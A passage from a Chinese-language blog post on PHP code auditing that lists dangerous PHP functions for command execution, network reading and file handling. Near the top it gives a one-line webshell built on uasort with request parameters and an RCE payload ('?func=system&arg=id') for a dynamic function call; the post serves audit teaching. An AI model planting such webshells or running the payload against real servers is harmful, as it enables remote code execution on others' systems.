<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">Array</span> ( [a] =&gt; <span class="number">4</span> [b] =&gt; <span class="number">8</span> [c] =&gt; -<span class="number">1</span> [d] =&gt; -<span class="number">9</span> [e] =&gt; <span class="number">2</span> [f] =&gt; <span class="number">5</span> [g] =&gt; <span class="number">3</span> [h] =&gt; -<span class="number">4</span> ) </span><br><span class="line"><span class="title function_ invoke__">Array</span> ( [d] =&gt; -<span class="number">9</span> [h] =&gt; -<span class="number">4</span> [c] =&gt; -<span class="number">1</span> [e] =&gt; <span class="number">2</span> [g] =&gt; <span class="number">3</span> [a] =&gt; <span class="number">4</span> [f] =&gt; <span class="number">5</span> [b] =&gt; <span class="number">8</span> )</span><br></pre></td></tr></table></figure>

<p>一句话利用代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="variable">$cmd</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>];</span><br><span class="line">	<span class="variable">$array</span> = <span class="keyword">array</span>(<span class="string">&#x27;test&#x27;</span>, <span class="variable">$_POST</span>[<span class="string">&#x27;m&#x27;</span>]);</span><br><span class="line">	<span class="title function_ invoke__">uasort</span>(<span class="variable">$array</span>, <span class="variable">$cmd</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h5 id="a-b动态函数"><a href="#a-b动态函数" class="headerlink" title="$a$b动态函数"></a>$a$b动态函数</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$action</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;func&#x27;</span>];</span><br><span class="line"><span class="variable">$param</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;arg&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="comment">// 直接动态调用</span></span><br><span class="line"><span class="variable">$action</span>(<span class="variable">$param</span>); </span><br></pre></td></tr></table></figure>

<p><strong>攻击原理：</strong></p>
<ul>
<li>攻击者控制<code>func</code>参数指定函数名</li>
<li>传入系统命令执行函数触发RCE</li>
</ul>
<p>攻击Payload：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="attribute">func</span>=system&amp;arg=id</span><br></pre></td></tr></table></figure>



<h4 id="读取网络资源的函数"><a href="#读取网络资源的函数" class="headerlink" title="读取网络资源的函数"></a>读取网络资源的函数</h4><p>常见的php读取远程文件的方式</p>
<h5 id="Fopen"><a href="#Fopen" class="headerlink" title="Fopen()"></a><strong>Fopen()</strong></h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$handle</span>=<span class="title function_ invoke__">fopen</span>(<span class="string">&quot;http://www.baidu.com&quot;</span>,<span class="string">&quot;rb&quot;</span>);</span><br><span class="line"><span class="variable">$contents</span>=<span class="string">&quot;&quot;</span>;</span><br><span class="line"><span class="keyword">while</span> (!<span class="title function_ invoke__">feof</span>(<span class="variable">$handle</span>)) &#123;</span><br><span class="line">	<span class="variable">$contents</span> .= <span class="title function_ invoke__">fread</span>(<span class="variable">$handle</span>, <span class="number">8192</span>);</span><br><span class="line">	</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">fclose</span>(<span class="variable">$handle</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$contents</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="file-get-content"><a href="#file-get-content" class="headerlink" title="file_get_content()"></a><strong>file_get_content()</strong></h5><p>file_get_contents() 函数的另一个强大之处在于可以用于发起 HTTP 请求，获取远程资源的内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$url</span> = <span class="string">&#x27;https://www.example.com&#x27;</span>;</span><br><span class="line"><span class="variable">$headers</span> = <span class="title function_ invoke__">get_headers</span>(<span class="variable">$url</span>, <span class="number">1</span>); <span class="comment">// 设置第二个参数为1，获取关联数组形式的头信息</span></span><br><span class="line"><span class="variable">$content</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$url</span>);</span><br></pre></td></tr></table></figure>



<h5 id="curl"><a href="#curl" class="headerlink" title="curl"></a><strong>curl</strong></h5><h4 id="php命令执行函数"><a href="#php命令执行函数" class="headerlink" title="php命令执行函数"></a>php命令执行函数</h4><h5 id="1，system函数"><a href="#1，system函数" class="headerlink" title="1，system函数"></a>1，system函数</h5><p>system():执行外部程序，并且返回输出</p>
<h5 id="2，shell-exec-没有回显的命令执行"><a href="#2，shell-exec-没有回显的命令执行" class="headerlink" title="2，shell_exec(没有回显的命令执行)"></a>2，shell_exec(没有回显的命令执行)</h5><p>shell_exec():通过shell环境，并且将完整的输出以字符串方式返回</p>
<h5 id="3，passthru函数"><a href="#3，passthru函数" class="headerlink" title="3，passthru函数"></a>3，passthru函数</h5><p>执行外部程序并且显示原始输出</p>
<h5 id="4，exec函数"><a href="#4，exec函数" class="headerlink" title="4，exec函数"></a>4，exec函数</h5><p> exec():执行一个外部程序</p>
<h5 id="4，ob-start函数"><a href="#4，ob-start函数" class="headerlink" title="4，ob_start函数"></a>4，ob_start函数</h5><h4 id="操作文件的函数"><a href="#操作文件的函数" class="headerlink" title="操作文件的函数"></a>操作文件的函数</h4><h5 id="Copy"><a href="#Copy" class="headerlink" title="Copy()"></a><strong>Copy()</strong></h5><p>copy() 函数拷贝文件</p>
<p>语法：copy(source,destination)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">copy</span>(<span class="string">&quot;source.txt&quot;</span>,<span class="string">&quot;target.txt&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="File-get-contents-File-put-contents"><a href="#File-get-contents-File-put-contents" class="headerlink" title="File_get_contents()&#x2F;File_put_contents"></a><strong>File_get_contents()&#x2F;File_put_contents</strong></h5><p>file_get_contents() 把整个文件读入一个字符串中。</p>
<p>语法：file_get_contents(path,include_path,context,start,max_length)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;test.txt&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>file_put_contents() 函数把一个字符串写入文件中。</p>
<p>语法：file_get_contents(path,include_path,context,start,max_length)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;test.txt&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>file_put_contents() 函数把一个字符串写入文件中。</p>
<p>语法：int file_put_contents ( string $filename , mixed $data [, int $flags &#x3D; 0 [, resource $context ]] )</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">file_put_contents</span>(<span class="string">&quot;sites.txt&quot;</span>,<span class="string">&quot;Runoob&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="File"><a href="#File" class="headerlink" title="File()"></a><strong>File()</strong></h5><p>file() 函数把整个文件读入一个数组中。</p>
<p>数组中的每个元素都是文件中相应的一行，包括换行符在内</p>
<p>语法：file(path,include_path,context)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">file</span>(<span class="string">&quot;test.txt&quot;</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="Fopen-1"><a href="#Fopen-1" class="headerlink" title="Fopen()"></a><strong>Fopen()</strong></h5><p>open() 函数打开一个文件或 URL。</p>
<p>如果 fopen() 失败，它将返回 FALSE 并附带错误信息。您可以通过在函数名前面添加一个 ‘@’ 来隐藏错误输出。</p>
<p>语法：fopen(filename,mode,include_path,context)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">fopen</span>(<span class="string">&quot;test.txt&quot;</span>,<span class="string">&quot;r&quot;</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">fopen</span>(<span class="string">&quot;/home/test/test.txt&quot;</span>,<span class="string">&quot;r&quot;</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">fopen</span>(<span class="string">&quot;/home/test/test.gif&quot;</span>,<span class="string">&quot;wb&quot;</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">fopen</span>(<span class="string">&quot;http://www.example.com/&quot;</span>,<span class="string">&quot;r&quot;</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">fopen</span>(<span class="string">&quot;ftp://user:password@example.com/test.txt&quot;</span>,<span class="string">&quot;w&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="Move-uploaded-file"><a href="#Move-uploaded-file" class="headerlink" title="Move_uploaded_file()"></a><strong>Move_uploaded_file()</strong></h5><p>move_uploaded_file() 函数把上传的文件移动到新位置。</p>
<p>如果成功该函数返回 TRUE，如果失败则返回 FALSE。</p>
<p>语法：move_uploaded_file(file,newloc)</p>
<h5 id="Readfile"><a href="#Readfile" class="headerlink" title="Readfile()"></a><strong>Readfile()</strong></h5><p>readfile() 函数读取一个文件，并写入到输出缓冲。</p>
<p>语法：readfile(filename,include_path,context)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">readfile</span>(<span class="string">&quot;test.txt&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="Rename"><a href="#Rename" class="headerlink" title="Rename()"></a><strong>Rename()</strong></h5><p>rename() 函数重命名文件或目录。</p>
<p>如果成功，该函数返回 TRUE。如果失败，则返回 FALSE。</p>
<p>语法：rename(oldname,newname,context)</p>
<h5 id="Unlink"><a href="#Unlink" class="headerlink" title="Unlink()"></a><strong>Unlink()</strong></h5><p>unlink() 函数删除文件。</p>
<p>如果成功，该函数返回 TRUE。如果失败，则返回 FALSE。</p>
<p>语法：unlink(filename,context)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$file</span> = <span class="string">&quot;test.txt&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="title function_ invoke__">unlink</span>(<span class="variable">$file</span>))</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">echo</span> (<span class="string">&quot;Error deleting <span class="subst">$file</span>&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">echo</span> (<span class="string">&quot;Deleted <span class="subst">$file</span>&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

</div><div class="tags"><ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">代码审计</a></li></ul></div><div class="post-nav"><a class="next" href="/2025/10/12/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">PHP代码审计-反序列化漏洞</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="search-form"><input id="local-search-input" placeholder="Search" type="text" name="q" results="0"/><div id="local-search-result"></div></div></div><div class="widget"><div class="author-info"><a class="info-avatar" href="/about/" title="关于"><img class="nofancybox" src="/img/avatar.jpg"/></a><p>所幸仍有光.</p><a class="info-icon" href="https://hackerhao.top" title="Email" target="_blank" style="margin-inline:5px"> <i class="fa fa-envelope-square" style="margin-inline:5px"></i></a><a class="info-icon" href="https://github.com/isMyHao" title="Github" target="_blank" style="margin-inline:5px"> <i class="fa fa-github-square" style="margin-inline:5px"></i></a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Java-Web%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E/">Java Web常见漏洞</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">Java基础知识</a><span class="category-list-count">14</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Java%E5%AE%89%E5%85%A8/">Java安全</a><span class="category-list-count">11</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Js%E5%AE%89%E5%85%A8/">Js安全</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">PHP代码审计</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/PHP%E5%AE%89%E5%85%A8/">PHP安全</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Win%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/">Win权限提升</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/linux%E6%8F%90%E6%9D%83/">linux提权</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/tools/">tools</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BA%91%E5%AE%89%E5%85%A8/">云安全</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%85%8D%E6%9D%80/">免杀</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%86%85%E7%BD%91/">内网</a><span class="category-list-count">7</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/">权限提升</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0/">漏洞发现</a><span class="category-list-count">1</span></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/Java%E5%AE%89%E5%85%A8/" style="font-size: 15px;">Java安全</a> <a href="/tags/Js%E5%AE%89%E5%85%A8/" style="font-size: 15px;">Js安全</a> <a href="/tags/Java%E5%9F%BA%E7%A1%80/" style="font-size: 15px;">Java基础</a> <a href="/tags/PHP%E5%AE%89%E5%85%A8/" style="font-size: 15px;">PHP安全</a> <a href="/tags/Java-Web%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E/" style="font-size: 15px;">Java Web常见漏洞</a> <a href="/tags/linux%E6%8F%90%E6%9D%83/" style="font-size: 15px;">linux提权</a> <a href="/tags/Java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" style="font-size: 15px;">Java基础知识</a> <a href="/tags/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 15px;">PHP代码审计</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 15px;">代码审计</a> <a href="/tags/%E4%BA%91%E5%AE%89%E5%85%A8/" style="font-size: 15px;">云安全</a> <a href="/tags/%E5%86%85%E7%BD%91/" style="font-size: 15px;">内网</a> <a href="/tags/tools/" style="font-size: 15px;">tools</a> <a href="/tags/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/" style="font-size: 15px;">权限提升</a> <a href="/tags/Win%E6%8F%90%E5%8D%87/" style="font-size: 15px;">Win提升</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0/" style="font-size: 15px;">漏洞发现</a> <a href="/tags/%E5%85%8D%E6%9D%80/" style="font-size: 15px;">免杀</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2025/10/13/php%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0%E6%80%BB%E7%BB%93/">PHP代码审计-弱类型</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/10/12/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">PHP代码审计-反序列化漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/10/12/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/">PHP代码审计-伪协议</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/10/11/php%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96/">PHP代码审计-变量覆盖</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/10/11/php%E5%BC%B1%E7%B1%BB%E5%9E%8B/">PHP代码审计-弱类型</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/10/09/%E6%A1%A5%E6%8E%A5%E6%A8%A1%E5%BC%8F/">Java设计模式-桥接模式</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/10/09/%E9%80%82%E9%85%8D%E5%99%A8%E6%A8%A1%E5%BC%8F/">Java设计模式-适配器模式</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/10/09/%E5%BB%BA%E9%80%A0%E8%80%85%E6%A8%A1%E5%BC%8F/">Java设计模式-建造者模式</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/10/06/%E5%8E%9F%E5%9E%8B%E6%A8%A1%E5%BC%8F/">Java设计模式-原型模式</a></li><li class="post-list-item"><a class="post-list-link" href="/2025/10/06/%E6%A8%A1%E6%9D%BF%E6%A8%A1%E5%BC%8F/">Java设计模式-模板模式</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div></div></div></div><div class="pure-u-1 pure-u-md-3-4"></div></div><script type="text/javascript" src="https://unpkg.com/@fancyapps/fancybox/dist/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=undefined" async></script><link rel="stylesheet" type="text/css" href="https://unpkg.com/@fancyapps/fancybox/dist/jquery.fancybox.min.css"><link rel="stylesheet" type="text/css" href="/css/search.css?v=undefined"><script type="text/javascript" src="/js/search.js?v=undefined"></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
  search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" color="0,0,0" opacity="0.5" zIndex="-2" count="50" src="https://unpkg.com/canvas-nest.js/dist/canvas-nest.js"></script><script type="text/javascript" src="/js/love.js?v=undefined"></script><script type="text/javascript" src="/js/copycode.js?v=undefined" successtext="复制成功！"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css?v=undefined"><link rel="stylesheet" type="text/css" href="/css/external.css?v=undefined"><script type="text/javascript" src="/js/codeblock-resizer.js?v=undefined"></script><script type="text/javascript" src="/js/smartresize.js?v=undefined"></script></div></body></html>